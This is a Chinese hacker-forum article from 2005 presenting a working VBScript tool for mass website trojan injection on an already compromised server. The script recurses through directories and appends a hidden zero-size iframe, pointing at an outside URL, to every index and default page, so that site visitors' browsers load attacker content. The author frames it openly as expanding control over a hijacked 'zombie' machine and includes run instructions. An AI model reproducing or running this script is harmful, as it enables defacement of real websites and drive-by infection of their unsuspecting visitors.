| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 |

您现在的位置： 中国X黑客小组 >> 技术文章 >> 黑客技术 >> 黑客教学 >> 文章正文 用户登录 新用户注册

VBS也能批量挂马    热     ★★★ 【字体：小 大】
VBS也能批量挂马
作者：未知    文章来源：黑客防线    点击数：    更新时间：2005-12-30
好不容易才得到一台肉鸡，在保住肉鸡的同时还不免要扩大自己的成果。挂马其实是一个不错的选择，还有很多比我们菜的菜鸟还不懂打补丁呢（嘻嘻……）!前天下载了个批量挂马程序看了下200多K，想放在肉鸡上测试一下，好不容易才上传到肉鸡上不知怎么，运行的时候弹出个错误窗口肉鸡就挂了(真是悲哀………)！于是就想自己用脚本写个，个子小又有安全感！（Socket:下次进一个网站估计要中几十次木马了。）  主要功能：遍历目录，寻找符合条件的文件把马写进去。  下面的是代码，只要把代码copy到文件里另存为scan.vbe在cmd下运行。  cscript scan.vbe 要挂马的目录  例：cscript scan.vbe D:\  ’版权信息  br="************************************" & vbCrLf  br=br & "* VBS 批量挂马脚本 *" & vbCrLf  br=br & "* BY BanLG *" & vbCrLf  br=br & "************************************" & vbCrLf & vbCrLf  br=br & "cscript scan.vbe D:\" & vbCrLf   ’马的地址  ma="</Script><IfRAME height=0 width=0 sRc=" & chr(34) & "http://www.hacker.com.cn" & chr(34) & "></IFrAME>"  ’要挂马的页面如果嫌不够还可以自己再加，记得要用”|”隔开  MyString="index.asp|index.html|index.htm|default.asp|default.html|default.htm"  ’以"|"为分隔符拆分成数组  MyArray = Split(MyString, "|", -1, 1)  web=WScript.Arguments(0)  ’如果web为空退出脚本  if web="" then  Wscript.echo (br)  window.Close  end if  Wscript.echo (br) & "马的地址：" & ma & vbCrLf & vbCrLf  ’创建对象  Set fso = createObject("Scripting.FileSystemObject")  ’开始扫描挂马  scan(web)  ’scan定义函数,扫描查找符合条件的文件把马的内容写到文件的结尾  sub scan(filesder)   set filesder=fso.getfolder(filesder)  ’得到当前目录的所有文件集合  set files=filesder.files   ’获取文件名  for each fext in files  Set file1 = fso.GetFile(fext)  filesext=file1.Name  ’把文件名转换成小写字母  ext=lcase(filesext)   For Each index in MyArray  ’判断文件是不是我们在MyString里限定的文件，如果是就写马  if ext=lcase(index) then  Set ts = fso.OpenTextFile(fext,8) ’打开文件并在文件末尾进行写操作  ts.WriteLine(ma)  ts.Close  echo=""  echo=fext & " .............ok"  Wscript.echo (echo)  end if  next  next  set subfolders=filesder.subfolders  for each subfolder in subfolders ’搜索其他目录,递归调用  scan(subfolder)  next   end sub  下面是我在本地测试的。  如果看不懂脚本可以参考下“VBScript 用户手册”，有什么问题可以到黑防论坛讨论，期待共同进步
文章录入：IceRiver    责任编辑：IceRiver
	上一篇文章： 用WebShell实现DDOS攻击 下一篇文章： ODBC：web/sql分离环境下的一个思路
【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新热点		最新推荐		相关文章
				“VB蠕虫变种MQ”病毒技术细 webshell下分离大文件资料 经典Webshell提权集合九招 VB.NET 拖动无边框窗体编程实 利用Serv-U自身缺陷提升 Web 病毒清除技巧u.vbe和u.bat手 小规模DDoS(拒绝服务)用Free NBSI2内部功能实现大揭谜 了解VB编写病毒的大体方法 用vbs来写sql注入等80端口的

网友评论：（只显示最新5条。评论内容只代表网友观点，与本站立场无关！）

关于我们 - 版权声明 - 帮助(？) - 广告服务 - 联系我们 - 友情链接 - 用户注册 -	Powered by ICE RIVER - STUDIO

» CnXHacker.CoM

© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved.